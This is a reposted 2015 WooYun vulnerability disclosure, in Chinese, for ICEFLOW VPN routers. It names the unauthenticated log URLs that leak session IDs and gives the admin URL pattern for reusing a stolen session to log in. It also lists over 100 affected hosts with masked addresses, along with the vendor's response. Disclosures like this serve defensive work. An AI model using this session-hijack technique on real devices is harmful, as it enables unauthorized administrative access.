发新话题
打印

上海冰峰网络某VPN路由设备存在通用型设计缺陷(可实时利用登录系统)

上海冰峰网络某VPN路由设备存在通用型设计缺陷(可实时利用登录系统)

漏洞概要
缺陷编号:        WooYun-2015-134377
漏洞标题:        上海冰峰网络某VPN路由设备存在通用型设计缺陷(可实时利用登录系统)
相关厂商:        上海冰峰网络技术有限公司
漏洞作者:        YY-2012
提交时间:        2015-08-18 16:49
公开时间:        2015-11-17 11:10
漏洞类型:        设计缺陷/逻辑错误
危害等级:        高
自评Rank:        10
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:        http://www.wooyun.org
Tags标签:设计缺陷/边界绕过 逻辑错误


漏洞详情披露状态:
2015-08-18:        细节已通知厂商并且等待厂商处理中
2015-08-19:        厂商已经确认,细节仅向厂商公开
2015-08-22:        细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-10-13:        细节向核心白帽子及相关领域专家公开
2015-10-23:        细节向普通白帽子公开
2015-11-02:        细节向实习白帽子公开
2015-11-17:        细节向公众公开

简要描述:附100+案例。
详细说明:由于“ICEFLOW VPN Router”设备产品存在各种日志文件未授权访问可导致系统敏感信息泄漏。(包括登录成功后的session值)


code 区域系统日志http://url/log/system.log
VPN日志http://url/log/vpn.log
移动用户日志http://url/log/mobile.log
防火墙日志http://url/log/firewall.log
访问日志http://url/log/access.log
告警日志http://url/log/warn.log
错误日志http://url/log/error.log
调试日志http://url/log1/debug.log

根据日志信息获得session后,可利用实时登录系统管理后台:


code 区域http://地址/cgi-bin/index?oid=10&session_id=通过“system.log”文件获取&l=0

漏洞证明:













案例:


code 区域**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8888/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8081/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8888/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8000/cgi-bin/index
**.**.**.**/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8888/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8000/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**/cgi-bin/index
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8080/cgi-bin/index
**.**.**.**:8080/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0
**.**.**.**:8443/cgi-bin/index?l=0

修复方案:限制访问各种日志等。

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应
厂商回应:
危害等级:高

漏洞Rank:15
确认时间:2015-08-19 11:08
厂商回复:CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2015-0134377

TOP

发新话题